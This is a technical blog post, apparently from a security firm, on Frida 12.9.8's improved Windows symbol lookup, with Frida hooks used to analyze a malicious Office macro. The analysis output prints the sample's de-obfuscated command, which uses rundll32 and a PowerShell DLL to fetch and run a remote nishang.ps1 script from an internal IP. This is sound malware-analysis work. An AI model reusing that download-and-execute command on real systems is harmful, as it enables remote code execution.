Frida has become more popular recently because it makes installing hooks with JavaScript so convenient. I have seen a lot of research using Frida on mobile platforms, but it seems to be gaining traction on Windows lately. At DarunGrim, we research new methodologies that security researchers can use in their day-to-day work. Frida is one of the tools we thought could be useful for Windows reverse engineering. During our testing, however, we found that its symbol lookup capability was a limiting factor for broader use of the tool. We made improvements, and they are now available in Frida 12.9.8. We are really thankful to Ole André Vadla Ravnås for his help in merging the changes.

We will briefly go through the changes we made and explain how you can use the improved symbol lookup capabilities to solve real-world problems.

Frida 12.9.8 Improvements

Basically, Frida uses the dbghelp.dll APIs to look up symbols on the Windows platform. What it lacked was symbol server support. We added symbol server support and improved how symbol strings are passed on Windows. With the older Frida implementation, each symbol lookup took some time because it used wildcard module names to look up any symbol. Now you can specify module names to speed up the symbol lookup.

The new Frida ships symsrv.dll alongside dbghelp.dll to support symbol servers, including the Microsoft symbol server.

These are the changes we made with help from Ole.

Case Study: Analyzing Office Macro Behavior

With the improved Frida functionality, here is an Office macro malware example to which we want to apply Frida for deep analysis.

Injection and instrumentation

The following diagram shows how Frida generally installs hooks and receives messages from the installed hooks.

There are frida, session, and script objects involved in this process to manage hook installation. The hooking callback is written in JavaScript.

The following code shows an example of how these objects can be used to install the JavaScript hooking code held in the self.script_text variable into the process identified by the process_id variable.

code.py

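    def instrument(self, process_id):
        # Attach to the target process and keep the session referenced.
        session = frida.attach(process_id)
        self.sessions.append(session)
        # Enable child gating so that child processes are reported to the host.
        session.enable_child_gating()
        # Load the JavaScript hooks and route their messages to on_message.
        script = session.create_script(self.script_text)
        script.on('message', self.on_message)
        script.load()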
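
The JavaScript snippets in the rest of this post call a log() helper whose definition is not shown here. A minimal sketch of one plausible definition follows, assuming it simply forwards text to the host. Inside a Frida script, send() delivers a message to the callback registered with script.on('message', ...); the console.log fallback is only there so the sketch also runs outside Frida. The name makeLogger is hypothetical and is not taken from the repository.

```javascript
// Hypothetical helper: builds a log(text) function around a message sink.
// Inside a Frida script the global send() posts a message to the host,
// where the 'message' callback registered with script.on() receives it.
function makeLogger(sink) {
  return function (text) {
    sink(String(text));
  };
}

// Assumption: prefer Frida's send() when it exists, else print locally.
var log = makeLogger(typeof send === 'function'
  ? function (text) { send(text); }
  : function (text) { console.log(text); });

log('[+] hooks installed');
```

Keeping the sink separate from the formatting makes it easy to swap the transport without touching the hooks.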

Symbol Lookup: resolveName

Frida JavaScript APIs are well described in the API documentation.

The first step in using Frida for hooking is finding the target function.

If the function is exported, you can simply call the Module.findExportByName method with the DLL name and the exported function name.

Module.findExportByName(dllName, name)

But if the function is not exported and is only recorded in, for example, a PDB symbol file, you can call the DebugSymbol.getFunctionByName method. With Frida 12.9.8, you can pass the “DLLName!FunctionName” notation to designate a specific function more accurately and to locate it faster.
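
As a small illustration of the notation, the sketch below builds the module-qualified name from a DLL file name. It is not part of Frida: qualifySymbol is a hypothetical helper, and it assumes the module name is the file name without its final extension.

```javascript
// Hypothetical helper: turn ("vbe7.dll", "__vbaStrCat") into "vbe7!__vbaStrCat".
function qualifySymbol(dllName, functionName) {
  // Drop any directory part, then only the last extension, so that a
  // file name containing several dots keeps the rest of its name.
  var fileName = dllName.split(/[\\/]/).pop();
  var dot = fileName.lastIndexOf('.');
  var moduleName = dot > 0 ? fileName.substring(0, dot) : fileName;
  return moduleName + '!' + functionName;
}

console.log(qualifySymbol('vbe7.dll', '__vbaStrCat'));
console.log(qualifySymbol('oleaut32.dll', 'DispCallFunc'));
```

The resulting string is what would be handed to DebugSymbol.getFunctionByName.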

Loading the symbols for a module can sometimes be slow because they might come from a remote symbol server. So, call the DebugSymbol.load method explicitly for just the modules you need, so that only a minimal number of symbols is loaded.

Here is example code that uses the Module.findExportByName and DebugSymbol methods to look up any exported function or any function that has symbols. It uses dictionaries to cache its findings and avoid duplicate work. This can reduce the overall symbol lookup time if you are hooking an enormous number of functions.

vbe.js

var loadedModules = {}
var resolvedAddresses = {}

function resolveName(dllName, name) {
  var moduleName = dllName.split('.')[0]
  var functionName = moduleName + "!" + name

  if (functionName in resolvedAddresses) {
    return resolvedAddresses[functionName]
  }

  log("resolveName " + functionName);
  log("Module.findExportByName " + dllName + " " + name);
  var addr = Module.findExportByName(dllName, name)

  if (!addr || addr.isNull()) {
    if (!(dllName in loadedModules)) {
      log(" DebugSymbol.loadModule " + dllName);

      try {
        DebugSymbol.load(dllName)
      } catch (err) {
        // Symbols could not be loaded; report "not found" like a failed lookup.
        return null;
      }

      log(" DebugSymbol.load finished");
      loadedModules[dllName] = 1
    }

    try {
      log(" DebugSymbol.getFunctionByName: " + functionName);
      addr = DebugSymbol.getFunctionByName(moduleName + '!' + name)
      log(" DebugSymbol.getFunctionByName: addr = " + addr);
    } catch (err) {
      log(" DebugSymbol.getFunctionByName: Exception")
    }
  }

  resolvedAddresses[functionName] = addr
  return addr
}
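
The caching idea in resolveName can be seen in isolation in the sketch below. It wraps any lookup function so that each name is resolved at most once. The slow lookup here is a stand-in stub, not a Frida call, and memoizeLookup is a hypothetical name.

```javascript
// Hypothetical wrapper: remember the result of a slow lookup per key.
function memoizeLookup(lookup) {
  var cache = {};
  return function (key) {
    // hasOwnProperty also catches cached failures (null), so a symbol
    // that could not be found is not looked up again either.
    if (Object.prototype.hasOwnProperty.call(cache, key)) {
      return cache[key];
    }
    var value = lookup(key);
    cache[key] = value;
    return value;
  };
}

// Stand-in for an expensive symbol lookup; counts how often it runs.
var calls = 0;
function slowLookup(name) {
  calls++;
  return name === 'vbe7!__vbaStrCat' ? '0x651e53e6' : null;
}

var resolve = memoizeLookup(slowLookup);
resolve('vbe7!__vbaStrCat');
resolve('vbe7!__vbaStrCat');
resolve('vbe7!missing');
resolve('vbe7!missing');
console.log('lookups performed: ' + calls);
```

Caching misses as well as hits matters when a symbol server is involved, since a failed lookup can be just as slow as a successful one.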

Setting Symbol Path

There are different approaches to setting up a symbol server in a Windows environment; we suggest setting the _NT_SYMBOL_PATH variable from the command line. The “Symbol path for Windows debuggers” documentation has a good description of how the variable is used.

The following uses “c:\symbols” as the local symbol store to cache symbols downloaded from the official Microsoft symbol server.

setx _NT_SYMBOL_PATH SRV*c:\symbols*https://msdl.microsoft.com/download/symbols

The following command lets the system use the default symbol store directory.

setx _NT_SYMBOL_PATH SRV*https://msdl.microsoft.com/download/symbols
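
To make the structure of the two values above easier to see, here is a small sketch that splits a symbol path into its parts. It is only an illustration: parseSymbolPath is a hypothetical helper, and it assumes that only the SRV*[cache*]server form and plain directories need to be recognized.

```javascript
// Hypothetical helper: split a symbol path into its entries.
// Assumption: only the "SRV*[cache*]server" form and plain directories
// are recognized; other forms are returned as plain directories.
function parseSymbolPath(symbolPath) {
  return symbolPath.split(';').filter(function (entry) {
    return entry.length > 0;
  }).map(function (entry) {
    var parts = entry.split('*');
    if (parts[0].toLowerCase() !== 'srv') {
      return { kind: 'directory', path: entry };
    }
    // SRV*server has no explicit cache; SRV*cache*server has one.
    return {
      kind: 'server',
      cache: parts.length > 2 ? parts[1] : null,
      server: parts[parts.length - 1]
    };
  });
}

var entries = parseSymbolPath(
  'SRV*c:\\symbols*https://msdl.microsoft.com/download/symbols');
console.log(JSON.stringify(entries));
```

A null cache in the result corresponds to the second command, where the default store directory is used.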

Running Malware and Observing Behavior

We used the following sample to test Frida’s improved symbol lookup capability. It has a certain amount of obfuscation, which can be easily analyzed using Frida hooks.

The code presented here can be found in the following GitHub repository.

Frida.examples.vbe

So, if you have launched a Word process and its process ID is 3064, the following command installs the hooks from the vbe.js file included in the repository. After installing the hooks, you can open the malicious document to observe its behavior.

> python inject.py -p 3064 vbe.js

resolveName vbe7!rtcShell
Module.findExportByName vbe7 rtcShell
Interceptor.attach: vbe7!rtcShell@0x652a2b76
resolveName vbe7!__vbaStrCat
Module.findExportByName vbe7 __vbaStrCat
 DebugSymbol.loadModule vbe7
 DebugSymbol.load finished
 DebugSymbol.getFunctionByName: vbe7!__vbaStrCat
 DebugSymbol.getFunctionByName: addr = 0x651e53e6
Interceptor.attach: vbe7!__vbaStrCat@0x651e53e6
resolveName vbe7!__vbaStrComp
Module.findExportByName vbe7 __vbaStrComp
 DebugSymbol.getFunctionByName: vbe7!__vbaStrComp
 DebugSymbol.getFunctionByName: addr = 0x651e56a2
Interceptor.attach: vbe7!__vbaStrComp@0x651e56a2
resolveName vbe7!rtcCreateObject
Module.findExportByName vbe7 rtcCreateObject
Interceptor.attach: vbe7!rtcCreateObject@0x653e6e4c
resolveName vbe7!rtcCreateObject2
Module.findExportByName vbe7 rtcCreateObject2
Interceptor.attach: vbe7!rtcCreateObject2@0x653e6ece
resolveName vbe7!CVbeProcs::CallMacro
Module.findExportByName vbe7 CVbeProcs::CallMacro
 DebugSymbol.getFunctionByName: vbe7!CVbeProcs::CallMacro
 DebugSymbol.getFunctionByName: addr = 0x6529019b
Interceptor.attach: vbe7!CVbeProcs::CallMacro@0x6529019b
resolveName oleaut32!DispCallFunc
Module.findExportByName oleaut32 DispCallFunc
Interceptor.attach: oleaut32!DispCallFunc@0x747995b0
[!] Ctrl+D on UNIX, Ctrl+Z on Windows/cmd.exe to detach from instrumented program.

Hooks For Monitoring Office Macro Behavior

vbe.js has a few interesting hooks for monitoring the behavior of malicious Office documents.

__vbaStrCat

vbe7.dll is the DLL in which the Visual Basic runtime engine is located. There are tons of interesting functions inside, but first we wanted to observe string de-obfuscation operations.

vbe7!__vbaStrCat is the function called when strings are concatenated in Visual Basic.

.text:651E53E6 ; __stdcall __vbaStrCat(x, x)
.text:651E53E6 ___vbaStrCat@8  proc near               ; CODE XREF: _lblEX_ConcatStr↑p

Many macro-based malware documents use string-based obfuscation. By observing string concatenation, you can watch the final de-obfuscated strings being constructed.

The following hooking code prints out the concatenated string for each call.

vbe.js

function hookVBAStrCat(moduleName) {
  hookFunction(moduleName, "__vbaStrCat", {
    onEnter: function (args) {
      log("[+] __vbaStrCat")
      // log('[+] ' + name);
      // dumpBSTR(args[0]);
      // dumpBSTR(args[1]);
    },
    onLeave: function (retval) {
      dumpBSTR(retval);
    }
  })
}

Here is one example of the output, showing the final de-obfuscated string.

[+] __vbaStrCat
[+] address: 0x2405009c
length: 328
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  43 00 3a 00 5c 00 57 00 69 00 6e 00 64 00 6f 00  C.:.\.W.i.n.d.o.
00000010  77 00 73 00 5c 00 53 00 79 00 73 00 74 00 65 00  w.s.\.S.y.s.t.e.
00000020  6d 00 33 00 32 00 5c 00 72 00 75 00 6e 00 64 00  m.3.2.\.r.u.n.d.
00000030  6c 00 6c 00 33 00 32 00 2e 00 65 00 78 00 65 00  l.l.3.2...e.x.e.
00000040  20 00 43 00 3a 00 5c 00 55 00 73 00 65 00 72 00   .C.:.\.U.s.e.r.
00000050  73 00 5c 00 74 00 65 00 73 00 74 00 65 00 72 00  s.\.t.e.s.t.e.r.
00000060  5c 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00  \.A.p.p.D.a.t.a.
00000070  5c 00 4c 00 6f 00 63 00 61 00 6c 00 5c 00 54 00  \.L.o.c.a.l.\.T.
00000080  65 00 6d 00 70 00 5c 00 70 00 6f 00 77 00 65 00  e.m.p.\.p.o.w.e.
00000090  72 00 73 00 68 00 64 00 6c 00 6c 00 2e 00 64 00  r.s.h.d.l.l...d.
000000a0  6c 00 6c 00 2c 00 6d 00 61 00 69 00 6e 00 20 00  l.l.,.m.a.i.n. .
000000b0  2e 00 20 00 7b 00 20 00 49 00 6e 00 76 00 6f 00  .. .{. .I.n.v.o.
000000c0  6b 00 65 00 2d 00 57 00 65 00 62 00 52 00 65 00  k.e.-.W.e.b.R.e.
000000d0  71 00 75 00 65 00 73 00 74 00 20 00 2d 00 75 00  q.u.e.s.t. .-.u.
000000e0  73 00 65 00 62 00 20 00 68 00 74 00 74 00 70 00  s.e.b. .h.t.t.p.
000000f0  3a 00 2f 00 2f 00 31 00 39 00 32 00 2e 00 31 00  :././.1.9.2...1.
00000100  36 00 38 00 2e 00 31 00 30 00 2e 00 31 00 30 00  6.8...1.0...1.0.
00000110  30 00 3a 00 38 00 30 00 38 00 30 00 2f 00 6e 00  0.:.8.0.8.0./.n.
00000120  69 00 73 00 68 00 61 00 6e 00 67 00 2e 00 70 00  i.s.h.a.n.g...p.
00000130  73 00 31 00 20 00 7d 00 20 00 5e 00 7c 00 20 00  s.1. .}. .^.|. .
00000140  69 00 65 00 78 00 3b 00                          i.e.x.;.

Here’s another example that shows how the “WScript.Shell” string is constructed from obfuscated strings.

[+] __vbaStrCat
[+] address: 0x23fa653c
length: 14
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  69 00 70 00 74 00 2e 00 53 00 68 00 65 00        i.p.t...S.h.e.
[+] __vbaStrCat
[+] address: 0x188e2624
length: 8
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  26 00 48 00 36 00 63 00                          &.H.6.c.
[+] __vbaStrCat
[+] address: 0xe5b82a4
length: 16
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  69 00 70 00 74 00 2e 00 53 00 68 00 65 00 6c 00  i.p.t...S.h.e.l.
[+] __vbaStrCat
[+] address: 0x23fa6e24
length: 8
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  26 00 48 00 36 00 63 00                          &.H.6.c.
[+] __vbaStrCat
[+] address: 0x23fa6a8c
length: 18
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  69 00 70 00 74 00 2e 00 53 00 68 00 65 00 6c 00  i.p.t...S.h.e.l.
00000010  6c 00                                            l.
[+] __vbaStrCat
[+] address: 0xe5b82a4
length: 26
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  57 00 53 00 63 00 72 00 69 00 70 00 74 00 2e 00  W.S.c.r.i.p.t...
00000010  53 00 68 00 65 00 6c 00 6c 00                    S.h.e.l.l.
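
The dumpBSTR helper used by the hook is not shown in this post. As a rough sketch of the decoding step it would need, the code below reads a BSTR from a plain byte array rather than from process memory, so it can run outside Frida. It assumes the usual BSTR layout: a 4-byte little-endian byte length stored immediately before the text, followed by UTF-16LE characters and a two-byte terminator. decodeBSTR and encodeBSTR are hypothetical names.

```javascript
// Hypothetical stand-in for dumpBSTR's decoding step, working on a plain
// byte array instead of process memory so that it runs outside Frida.
// Layout assumed: [4-byte little-endian byte length][UTF-16LE text][00 00],
// with the BSTR pointer aimed at the first byte of the text.
function decodeBSTR(bytes, textOffset) {
  var view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  var byteLength = view.getUint32(textOffset - 4, true);
  var text = '';
  for (var i = 0; i < byteLength; i += 2) {
    text += String.fromCharCode(view.getUint16(textOffset + i, true));
  }
  return { byteLength: byteLength, text: text };
}

// Build a test buffer laid out as described above.
function encodeBSTR(text) {
  var bytes = new Uint8Array(4 + text.length * 2 + 2);
  var view = new DataView(bytes.buffer);
  view.setUint32(0, text.length * 2, true);
  for (var i = 0; i < text.length; i++) {
    view.setUint16(4 + i * 2, text.charCodeAt(i), true);
  }
  return bytes;
}

var decoded = decodeBSTR(encodeBSTR('WScript.Shell'), 4);
console.log(decoded.byteLength + ' bytes: ' + decoded.text);
```

The 26-byte length for the 13-character string lines up with the "length: 26" line in the last dump above.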

rtcCreateObject2

One of the many behaviors that malicious macros show is creating objects to perform system operations. The function that performs this action is rtcCreateObject2.

.text:653E6ECE ; int __stdcall rtcCreateObject2(int, LPCOLESTR szUserName, wchar_t *Str2)
.text:653E6ECE                 public _rtcCreateObject2@8
.text:653E6ECE _rtcCreateObject2@8 proc near           ; DATA XREF: .text:off_651D379C↑o

The rtcCreateObject2 function is called when new objects are created in the VB engine.

The following hook monitors the args[2] argument (wchar_t *Str2), which contains the name of the object being created.

vbe.js

function hookRtcCreateObject2(moduleName) {
  hookFunction(moduleName, "rtcCreateObject2", {
    onEnter: function (args) {
      log('[+] rtcCreateObject2');
      dumpAddress(args[0]);
      dumpBSTR(args[1]);
      log(ptr(args[2]).readUtf16String())
    },
    onLeave: function (retval) {
      dumpAddress(retval);
    }
  })
}

The example session shows the CreateObject method creating a WScript.Shell object. This object is used to run external commands from the script, so we can expect that this script will run an external malicious command.

[+] rtcCreateObject2
[+] address: 0xef66dc
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000010  a4 82 5b 0e 8c 6a fa 23 74 85 5b 0e 8c 67 ef 00  ..[..j.#t.[..g..
00000020  fa 17 be 1b 8c 67 ef 00 d0 6a 2e 75 e0 f1 c0 0c  .....g...j.u....
00000030  60 91                                            `.
[+] address: 0xe5b82a4
length: 26
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  57 00 53 00 63 00 72 00 69 00 70 00 74 00 2e 00  W.S.c.r.i.p.t...
00000010  53 00 68 00 65 00 6c 00 6c 00                    S.h.e.l.l.

DispCallFunc

One of the more interesting APIs is the DispCallFunc function, which is used to call COM methods. By monitoring this API, we can gain better insight into what the malware is trying to do.

The prototype of the function looks like the following.

HRESULT DispCallFunc(
  void       *pvInstance,
  ULONG_PTR  oVft,
  CALLCONV   cc,
  VARTYPE    vtReturn,
  UINT       cActuals,
  VARTYPE    *prgvt,
  VARIANTARG **prgpvarg,
  VARIANT    *pvargResult
);

The first argument, pvInstance, holds the pointer to the COM instance, and the second argument, oVft, holds the offset of the method being called within the instance's virtual function table. By reading the vtable pointer from the instance and adding the offset, you can locate the function that the COM call will eventually invoke.
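
The calculation can be sketched outside Frida with a toy memory model. In the code below, memory is just a map from addresses to stored pointer values, and resolveComMethod is a hypothetical helper. The vtable, slot, and target addresses are the ones from the example output in this post; the instance address 0x1000 is made up for the illustration.

```javascript
// Hypothetical model of the lookup: memory is a map from address to the
// pointer-sized value stored there; readPointer stands in for a real read.
function resolveComMethod(readPointer, pvInstance, oVft) {
  var vtable = readPointer(pvInstance);   // object starts with vtable pointer
  var slot = vtable + oVft;               // oVft is a byte offset, not an index
  return { vtable: vtable, slot: slot, target: readPointer(slot) };
}

// Values taken from the example output in this post; the instance
// address 0x1000 is made up for the illustration.
var memory = {};
memory[0x1000] = 0x69901070;      // pvInstance -> vtable
memory[0x69901094] = 0x69906260;  // vtable + 0x24 -> method address

var result = resolveComMethod(function (address) {
  return memory[address];
}, 0x1000, 0x24);

console.log('slot index: ' + (0x24 / 4));  // assumes 4-byte pointers
console.log('target: 0x' + result.target.toString(16));
```

Because oVft is a byte offset, dividing it by the pointer size gives the method's position in the vtable, which can help when matching it against an interface definition.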

The following is the hook for this function, which prints out the actual COM method name and its instructions. Frida has APIs for disassembling instructions, which are really useful in this case.

function hookDispCall(moduleName) {
  hookFunction(moduleName, "DispCallFunc", {
    onEnter: function (args) {
      log("[+] DispCallFunc")
      var pvInstance = args[0]
      var oVft = args[1]
      // Read pointer-sized values so the hook also works in 64-bit processes.
      var instance = pvInstance.readPointer();

      log(' instance:' + instance);
      log(' oVft:' + oVft);
      var vftbPtr = instance.add(oVft)
      log(' vftbPtr:' + vftbPtr);
      var functionAddress = vftbPtr.readPointer()

      loadModuleForAddress(functionAddress)
      var functionName = DebugSymbol.fromAddress(functionAddress)

      if (functionName) {
        log(' functionName:' + functionName);
      }

      dumpAddress(functionAddress);

      var currentAddress = functionAddress
      for (var i = 0; i < 10; i++) {
        try {
          var instruction = Instruction.parse(currentAddress)
          log(instruction.address + ': ' + instruction.mnemonic + ' ' + instruction.opStr)
          currentAddress = instruction.next
        } catch (err) {
          break
        }
      }
    }
  })
}

The following example output shows a COM method call to wshom.ocx!CWshShell::Run.

[+] DispCallFunc
 instance:0x69901070
 oVft:0x24
 vftbPtr:0x69901094
 functionAddress:0x69906260
 modules.length:133
 wshom.ocx: 0x69900000 147456 C:\Windows\System32\wshom.ocx
  DebugSymbol.loadModule C:\Windows\System32\wshom.ocx
  DebugSymbol.loadModule loadedModuleBase: true
 functionName:0x69906260 wshom.ocx!CWshShell::Run

[+] address: 0x69906260
           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  8b ff 55 8b ec 81 ec 5c 08 00 00 a1 b4 52 91 69  ..U....\.....R.i
00000010  33 c5 89 45 fc 8b 45 10 8b 4d 14 8b 55 18 89 85  3..E..E..M..U...
00000020  f8 f7 ff ff 89 8d ec f7 ff ff 89 95 e4 f7 ff ff  ................
00000030  c7 85                                            ..

0x69906260: mov edi, edi
0x69906262: push ebp
0x69906263: mov ebp, esp
0x69906265: sub esp, 0x85c
0x6990626b: mov eax, dword ptr [0x699152b4]
0x69906270: xor eax, ebp
0x69906272: mov dword ptr [ebp - 4], eax
0x69906275: mov eax, dword ptr [ebp + 0x10]
0x69906278: mov ecx, dword ptr [ebp + 0x14]
0x6990627b: mov edx, dword ptr [ebp + 0x18]

You can also add a device callback to monitor process creation. The following shows a rundll32 child process being used to call the main function of powershdll.dll in order to run a PowerShell command.

⚡ child_added: Child(pid=6300, parent_pid=3064, origin=spawn, path='C:\\Windows\\System32\\rundll32.exe', argv=['C:\\Windows\\System32\\rundll32.exe', 'C:\\Users\\tester\\AppData\\Local\\Temp\\powershdll.dll,main', '.', '{', 'Invoke-WebRequest', '-useb', 'http://192.168.10.100:8080/nishang.ps1', '}', '^|', 'iex;'], envp=None)
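
One way to tie a child process back to the macro is to compare its argv with the strings captured earlier by the __vbaStrCat hook. The sketch below does this for the values shown in this post. It is an illustration only: findLaunchingString is a hypothetical helper, and it assumes that joining argv with single spaces approximates the original command line closely enough for comparison.

```javascript
// Hypothetical check: does a child's argv match a string captured earlier?
// Assumption: joining argv with single spaces is a good enough
// approximation of the original command line for comparison purposes.
function normalize(text) {
  return text.replace(/\s+/g, ' ').trim();
}

function findLaunchingString(argv, capturedStrings) {
  var commandLine = normalize(argv.join(' '));
  for (var i = 0; i < capturedStrings.length; i++) {
    if (normalize(capturedStrings[i]) === commandLine) {
      return capturedStrings[i];
    }
  }
  return null;
}

var captured = [
  'WScript.Shell',
  'C:\\Windows\\System32\\rundll32.exe ' +
    'C:\\Users\\tester\\AppData\\Local\\Temp\\powershdll.dll,main ' +
    '. { Invoke-WebRequest -useb http://192.168.10.100:8080/nishang.ps1 } ^| iex;'
];
var argv = ['C:\\Windows\\System32\\rundll32.exe',
  'C:\\Users\\tester\\AppData\\Local\\Temp\\powershdll.dll,main',
  '.', '{', 'Invoke-WebRequest', '-useb',
  'http://192.168.10.100:8080/nishang.ps1', '}', '^|', 'iex;'];

console.log(findLaunchingString(argv, captured) !== null);
```

Here the child's command line matches the 328-byte string seen in the __vbaStrCat output, which links the rundll32 launch to the de-obfuscated macro string.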

Conclusion

Frida is the most convenient and handy dynamic analysis tool that I have ever used on the Windows platform. There are WinDbg, OllyDbg, and PyKD for advanced reverse engineering, and they have their places and uses. But for really quick and repetitive analysis work, Frida is more than enough, and it has powerful capabilities for dumping and analyzing program behavior. With Frida 12.9.8, we now have better symbol handling, which will increase overall usability and productivity.

Training Information

DarunGrim is a threat intelligence and knowledge company. We provide training on using Frida for Windows reverse engineering. Please contact us for details.